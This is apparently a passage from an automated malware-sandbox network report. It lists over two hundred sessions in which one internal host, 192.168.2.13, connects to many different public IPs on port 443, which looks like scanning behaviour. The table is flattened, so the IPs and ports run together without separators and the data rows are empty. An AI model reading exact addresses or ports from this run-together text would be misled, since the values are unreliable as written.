                                                  12195192.168.2.134622447.205.244.1248080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12196192.168.2.1355238169.206.253.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12197192.168.2.133290053.191.1.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12198192.168.2.1336540179.4.159.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12199192.168.2.1351696151.198.226.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12200192.168.2.1340060146.228.189.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12201192.168.2.133490249.224.57.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12202192.168.2.1338370162.4.30.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12203192.168.2.134565613.209.167.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12204192.168.2.1359062201.165.238.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12205192.168.2.135313045.53.123.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12206192.168.2.133298690.150.120.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12207192.168.2.1358420148.15.14.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12208192.168.2.1349506165.239.113.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12209192.168.2.133653045.252.199.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12210192.168.2.1348672173.77.169.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12211192.168.2.1334358184.209.20.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12212192.168.2.1339682204.44.214.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12213192.168.2.13337441.36.155.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12214192.168.2.135960296.5.0.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12215192.168.2.135001232.221.167.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12216192.168.2.1337904156.57.223.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12217192.168.2.1343008209.140.118.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12218192.168.2.1347622114.238.183.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12219192.168.2.1333732180.93.165.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12220192.168.2.1351692213.153.36.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12221192.168.2.1340984216.188.36.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12222192.168.2.135806473.35.71.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12223192.168.2.1353390178.213.255.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12224192.168.2.1343460129.156.69.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12225192.168.2.1344756110.185.93.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12226192.168.2.1338552131.95.138.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12227192.168.2.1340934213.142.48.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12228192.168.2.135073479.52.226.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12229192.168.2.1357720159.31.17.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12230192.168.2.1336464205.207.39.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12231192.168.2.1343538207.187.29.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12232192.168.2.1352646158.73.191.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12233192.168.2.1348446194.18.134.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12234192.168.2.1359464208.48.121.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12235192.168.2.134216044.76.15.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12236192.168.2.1333952219.68.37.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12237192.168.2.1343852112.2.215.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12238192.168.2.13386325.223.132.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12239192.168.2.135683491.244.4.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12240192.168.2.1340810217.76.40.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12241192.168.2.134238490.45.109.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12242192.168.2.135267832.53.10.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12243192.168.2.1360636161.177.92.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12244192.168.2.135706260.108.233.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12245192.168.2.1360790138.83.127.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12246192.168.2.133633037.101.211.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12247192.168.2.1335726217.4.189.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12248192.168.2.135375614.36.228.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12249192.168.2.1344170144.84.165.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12250192.168.2.1338928164.63.5.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12251192.168.2.133706683.212.75.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12252192.168.2.13573209.189.129.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12253192.168.2.1355360106.246.153.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12254192.168.2.1336154164.44.158.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12255192.168.2.1342354121.87.114.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12256192.168.2.1351844200.74.123.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12257192.168.2.1350232111.209.20.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12258192.168.2.1344618116.45.160.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12259192.168.2.134355689.218.130.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12260192.168.2.1343144137.65.56.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12261192.168.2.1343598189.21.3.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12262192.168.2.1333560105.188.92.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12263192.168.2.134933273.87.176.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12264192.168.2.1357044209.94.67.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12265192.168.2.134949858.197.215.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12266192.168.2.1350952156.66.61.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12267192.168.2.134664214.220.74.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12268192.168.2.1343144217.246.180.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12269192.168.2.1351650174.126.112.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12270192.168.2.134326268.121.174.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12271192.168.2.1349304157.4.66.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12272192.168.2.1352742177.82.226.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12273192.168.2.134921213.86.19.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12274192.168.2.1356170119.74.163.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12275192.168.2.1347514138.82.254.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12276192.168.2.134010870.167.31.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12277192.168.2.1355278149.217.24.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12278192.168.2.1348956180.184.230.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12279192.168.2.133756227.59.1.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12280192.168.2.1356680118.84.65.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12281192.168.2.135494612.41.71.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12282192.168.2.135642441.220.25.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12283192.168.2.1349566137.253.245.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12284192.168.2.1343114115.206.10.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12285192.168.2.1340814174.187.213.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12286192.168.2.1347056104.33.56.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12287192.168.2.13572681.41.95.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12288192.168.2.1358836167.6.89.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12289192.168.2.1337560181.2.140.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12290192.168.2.13606441.201.239.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12291192.168.2.135477617.245.44.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12292192.168.2.135636077.6.25.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12293192.168.2.135266475.235.246.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12294192.168.2.1351918108.36.200.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12295192.168.2.1349906210.47.164.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12296192.168.2.1343420211.201.138.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12297192.168.2.1335910221.100.181.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12298192.168.2.1352536155.131.184.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12299192.168.2.133844066.115.253.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12300192.168.2.134767254.61.102.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12301192.168.2.1336330145.248.196.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12302192.168.2.135958283.8.104.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12303192.168.2.1355280170.158.80.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12304192.168.2.1346244211.184.186.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12305192.168.2.135945843.4.246.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12306192.168.2.1358600195.99.65.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12307192.168.2.135358675.7.184.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12308192.168.2.133852642.54.32.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12309192.168.2.133738896.206.156.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12310192.168.2.1358506194.96.22.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12311192.168.2.1354112121.19.157.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12312192.168.2.135606875.46.202.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12313192.168.2.1343592122.61.109.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12314192.168.2.133788083.243.105.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12315192.168.2.13405285.133.124.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12316192.168.2.1357746194.60.105.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12317192.168.2.1359874206.101.18.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12318192.168.2.1339922141.181.222.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12319192.168.2.135667032.147.111.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12320192.168.2.1356824103.83.24.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12321192.168.2.1360378102.230.59.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12322192.168.2.1343564198.11.149.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12323192.168.2.1341970171.42.173.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12324192.168.2.1353372114.155.68.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12325192.168.2.1354804165.124.83.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12326192.168.2.1333212114.59.175.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12327192.168.2.134597638.148.147.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12328192.168.2.1342916217.42.151.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12329192.168.2.1338928145.153.102.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12330192.168.2.1353508137.118.166.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12331192.168.2.1355270140.203.10.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12332192.168.2.1343012169.47.80.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12333192.168.2.134023695.154.9.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12334192.168.2.136048239.0.86.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12335192.168.2.1359032212.188.184.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12336192.168.2.1359322165.52.124.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12337192.168.2.1336766195.11.18.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12338192.168.2.1356978179.164.52.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12339192.168.2.133612057.82.70.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12340192.168.2.1359044160.5.87.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12341192.168.2.1347184161.26.225.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12342192.168.2.1357316207.129.103.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12343192.168.2.135784469.185.217.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12344192.168.2.135116444.155.90.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12345192.168.2.1336682204.185.129.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12346192.168.2.134544252.244.207.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12347192.168.2.135826265.253.54.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12348192.168.2.1351712142.181.39.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12349192.168.2.1336332173.146.78.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12350192.168.2.1348968192.163.40.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12351192.168.2.134631463.177.216.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12352192.168.2.135307836.126.248.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12353192.168.2.1344382187.19.93.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12354192.168.2.1346008107.115.111.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12355192.168.2.134533412.38.66.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12356192.168.2.135451046.41.219.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12357192.168.2.134060859.113.196.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12358192.168.2.1343210103.56.54.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12359192.168.2.1341992119.72.188.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12360192.168.2.1333770221.115.242.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12361192.168.2.134278086.68.124.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12362192.168.2.134998078.0.60.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12363192.168.2.134965234.242.55.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12364192.168.2.134200050.174.6.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12365192.168.2.1359086108.209.152.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12366192.168.2.1339958137.124.44.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12367192.168.2.1360990197.44.49.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12368192.168.2.1356724101.219.52.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12369192.168.2.1347510195.58.130.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12370192.168.2.1347764141.120.78.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12371192.168.2.1347770168.24.240.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12372192.168.2.134427646.215.168.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12373192.168.2.1335498174.5.106.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12374192.168.2.135201413.96.36.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12375192.168.2.135646413.195.209.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12376192.168.2.1337908178.189.224.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12377192.168.2.135107636.48.81.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12378192.168.2.1333612138.234.162.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12379192.168.2.133385497.155.254.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12380192.168.2.135997627.90.164.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12381192.168.2.13585348.202.198.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12382192.168.2.1336812192.34.100.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12383192.168.2.1334932107.22.229.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12384192.168.2.1354424120.207.209.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12385192.168.2.134346493.223.67.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12386192.168.2.1335040165.207.115.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12387192.168.2.134849840.227.23.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12388192.168.2.133342612.47.123.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12389192.168.2.1359940203.59.251.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12390192.168.2.133753698.175.209.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12391192.168.2.134605482.240.202.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12392192.168.2.134893424.164.247.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12393192.168.2.134663849.40.31.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12394192.168.2.1350328199.202.70.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12395192.168.2.1352156110.74.136.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12396192.168.2.1343598221.169.128.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12397192.168.2.133400244.120.70.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12398192.168.2.1344418164.223.144.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12399192.168.2.134194877.244.186.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12400192.168.2.1336236213.156.52.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12401192.168.2.133869035.35.21.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12402192.168.2.133962088.43.231.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12403192.168.2.1356254173.133.199.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12404192.168.2.1344776202.162.218.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12405192.168.2.1345234217.31.40.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12406192.168.2.13374205.25.6.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12407192.168.2.1355516204.152.250.207443
